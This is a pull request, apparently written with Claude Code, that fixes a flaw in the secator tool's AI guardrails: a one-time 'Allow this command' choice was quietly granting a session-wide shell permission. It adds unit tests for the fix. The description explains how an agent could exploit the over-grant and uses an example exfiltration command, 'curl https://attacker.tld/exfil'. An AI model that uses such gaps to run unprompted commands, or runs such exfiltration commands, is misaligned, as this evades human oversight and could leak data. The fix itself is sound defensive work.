### PR TITLE
fix(ai): make "allow this command" a true one-shot, not a session rule (H9)

### DIFF
--- a/secator/ai/guardrails.py
+++ b/secator/ai/guardrails.py
@@ -951,10 +951,7 @@ class PermissionEngine:
 			return "deny"
 
 		idx, _ = result
-		if idx == 0:  # Allow this specific command (one-time, no rule added)
-			# Add a runtime allow for each cmd name in this command
-			if cmd_names:
-				self.add_runtime_allow([f"shell({','.join(cmd_names)})"])
+		if idx == 0:  # Allow ONLY this invocation — no rule added, next call re-prompts (H9)
 			return "allow"
 		elif idx == 1:  # Allow all commands with this name
 			self.add_runtime_allow([f"shell({prompt_cmd})"])

--- a/tests/unit/test_ai_guardrails.py
+++ b/tests/unit/test_ai_guardrails.py
@@ -1,6 +1,6 @@
 # tests/unit/test_ai_guardrails.py
 import unittest
-from unittest.mock import patch
+from unittest.mock import MagicMock, patch
 
 from secator.definitions import ADDONS_ENABLED
 
@@ -409,6 +409,54 @@ class TestPromptTarget(unittest.TestCase):
 		with patch.object(engine, '_show_target_menu', return_value=[4]):
 			result = engine.prompt_target("10.5.2.3", interactive=True)
 		self.assertEqual(result, "deny")
+
+
+@unittest.skipUnless(ADDONS_ENABLED['ai'], 'ai addon not installed')
+class TestPromptShell(unittest.TestCase):
+
+	def _make_engine(self, allow=None, deny=None, ask=None):
+		config = {"allow": allow or [], "deny": deny or [], "ask": ask or []}
+		return PermissionEngine(config)
+
+	def _menu_returning(self, idx):
+		"""Patch the rich menu so .show() yields (idx, label)."""
+		menu = MagicMock()
+		menu.return_value.show.return_value = (idx, "")
+		return menu
+
+	def test_prompt_shell_non_interactive_returns_deny(self):
+		engine = self._make_engine(ask=["shell(*)"])
+		self.assertEqual(engine.prompt_shell("curl https://x", interactive=False), "deny")
+
+	def test_allow_this_command_is_one_shot(self):
+		"""Option 0 approves ONLY this invocation — no session rule; the next call re-prompts (H9)."""
+		engine = self._make_engine(ask=["shell(*)"])
+		with patch('secator.rich.InteractiveMenu', self._menu_returning(0)), \
+		     patch('secator.ai.guardrails._extract_cmd_names', return_value=["curl"]):
+			result = engine.prompt_shell("curl https://good.example")
+		self.assertEqual(result, "allow")
+		# No runtime rule was added, so a second, different-arg curl is NOT auto-allowed
+		self.assertEqual(engine.runtime_allow, [])
+		self.assertEqual(engine._check_value("shell", "curl").decision, "ask")
+
+	def test_allow_all_commands_adds_session_rule(self):
+		"""Option 1 persists a session-wide allow for the command name (unchanged)."""
+		engine = self._make_engine(ask=["shell(*)"])
+		with patch('secator.rich.InteractiveMenu', self._menu_returning(1)), \
+		     patch('secator.ai.guardrails._extract_cmd_names', return_value=["curl"]):
+			result = engine.prompt_shell("curl https://good.example")
+		self.assertEqual(result, "allow")
+		self.assertEqual(engine.runtime_allow, [("shell", ["curl"])])
+		# Now any curl is auto-allowed for the session
+		self.assertEqual(engine._check_value("shell", "curl").decision, "allow")
+
+	def test_deny_choice_blocks(self):
+		engine = self._make_engine(ask=["shell(*)"])
+		with patch('secator.rich.InteractiveMenu', self._menu_returning(2)), \
+		     patch('secator.ai.guardrails._extract_cmd_names', return_value=["curl"]):
+			result = engine.prompt_shell("curl https://good.example")
+		self.assertEqual(result, "deny")
+		self.assertEqual(engine.runtime_allow, [])
 
 
 @unittest.skipUnless(ADDONS_ENABLED['ai'], 'ai addon not installed')


### PR DESCRIPTION
## Finding
**H9** — "Allow this command" silently grants a session-wide rule.

## Root cause
In `secator/ai/guardrails.py`, `prompt_shell` option 0 was labelled "Allow this command" with an in-code comment claiming "one-time, no rule added", but it actually called `add_runtime_allow(["shell(<cmd_names>)"])`. That persists a **session-wide** allow keyed by command **name**. So after approving `curl https://good.example` once, the agent could later run `curl https://attacker.tld/exfil` (any `curl`) with no prompt.

## Fix
Option 0 now returns `"allow"` for the **current invocation only** and adds **no** runtime rule, so the next `curl` re-prompts. The session-wide `add_runtime_allow(["shell(<cmd>)"])` is reserved for the explicit option 1 "Allow all '<cmd>' commands" (unchanged). The misleading comment is corrected. The decision is consumed per-action by `interactivity.py`, so returning `"allow"` without mutating the engine is a genuine one-shot.

## Validation
- `python3 -m py_compile secator/ai/guardrails.py` — OK.
- New `TestPromptShell` tests pass (mock the rich menu; no `shfmt` needed):
  - `test_allow_this_command_is_one_shot` — option 0 leaves `runtime_allow` empty and a second `_check_value("shell", "curl")` still returns `ask`.
  - `test_allow_all_commands_adds_session_rule` — option 1 still persists `("shell", ["curl"])`.
  - `test_deny_choice_blocks`, `test_prompt_shell_non_interactive_returns_deny`.
- The pre-existing `~50` parser-dependent failures in `test_ai_guardrails.py` (incl. `test_add_runtime_allow`) fail on the base branch too — they require `shfmt` (the safecmd parser), which is not installed in this environment. Confirmed by stashing this change and re-running.

## Extra issues surfaced
- The previous behavior used `shell(<comma-joined cmd_names>)` as the rule, so a compound approval (`a | b`) would silently allow **every** sub-command name session-wide — a broader version of the same over-grant. Now moot for option 0; option 1 only ever allows the single `prompt_cmd`.
- The interactive shell menu has no "deny + remember" / per-target scoping; even option 1's name-only matching ignores args/targets (a known limitation of the shell allow model, out of scope here).

🤖 Generated with [Claude Code](https://claude.com/claude-code)

https://claude.ai/code/session_01NNjPggRSVZ2xnLb7ZxWP5H